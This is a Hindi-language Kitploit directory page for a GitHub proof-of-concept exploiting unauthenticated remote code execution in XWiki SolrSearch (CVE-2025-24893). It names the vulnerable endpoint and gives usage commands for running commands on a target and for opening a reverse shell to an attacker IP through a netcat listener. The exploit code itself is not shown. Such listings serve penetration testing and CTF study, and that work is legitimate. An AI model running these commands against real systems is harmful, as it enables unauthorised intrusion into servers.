Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/torjan0/xwiki_solrsearch-rce-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubtorjan0/xwiki_solrsearch-rce-exploit

xwiki_solrsearch-rce-exploit

XWiki SolrSearch (CVE-2025-24893) के लिए अनधिकृत RCE PoC. कमांड निष्पादन + रिवर्स शेल.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

solrsearch-rce-exploit

XWiki SolrSearch के लिए बिना प्रमाणीकरण के RCE PoC (CVE-2025-24893). कमांड निष्पादन + रिवर्स शेल।

CVE-2025-24893 – XWiki SolrSearch RCE PoC

XWiki SolrSearch टेम्पलेट इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन की ओर ले जाता है।

XWiki Debian 15.10.8 पर परीक्षण किया गया (15.10.11 / 16.4.1 / 16.5.0RC1 में पैच किया गया).

⚠️ केवल शैक्षिक उपयोग के लिए। इसे उन सिस्टमों पर न चलाएं जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।

यह क्या करता है

  • /xwiki/bin/get/Main/SolrSearch के माध्यम से तैयार किए गए Groovy पेलोड भेजता है।
  • मनमाने कमांड निष्पादित करता है और आउटपुट को साफ डिकोडिंग के लिए Base64 मार्करों में लपेटता है।
  • Java सॉकेट का उपयोग करके रिवर्स शेल लॉन्च करने का समर्थन करता है।

आवश्यकताएँ

  • Python 3.x
  • निर्भरताएँ स्थापित करें:
root@kitploit:~
pip install requests

उपयोग

स्क्रिप्ट चलाते समय लक्ष्य होस्ट (और वैकल्पिक पथ) निर्दिष्ट करें।

बुनियादी कमांड चलाएं:

root@kitploit:~
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"

रिवर्स शेल प्रारंभ करें:

root@kitploit:~
# On attacker box
nc -lvnp 4444

# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444

नोट्स

  • एंडपॉइंट: /xwiki/bin/get/Main/SolrSearch?media=rss&text=...
  • साफ Base64 आउटपुट विश्वसनीय पार्सिंग सुनिश्चित करता है।
  • मूल रूप से HTB Editor के दौरान प्रदर्शित किया गया, लेकिन अन्य कमजोर इंस्टेंस पर लागू।
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
टूल डाउनलोड करें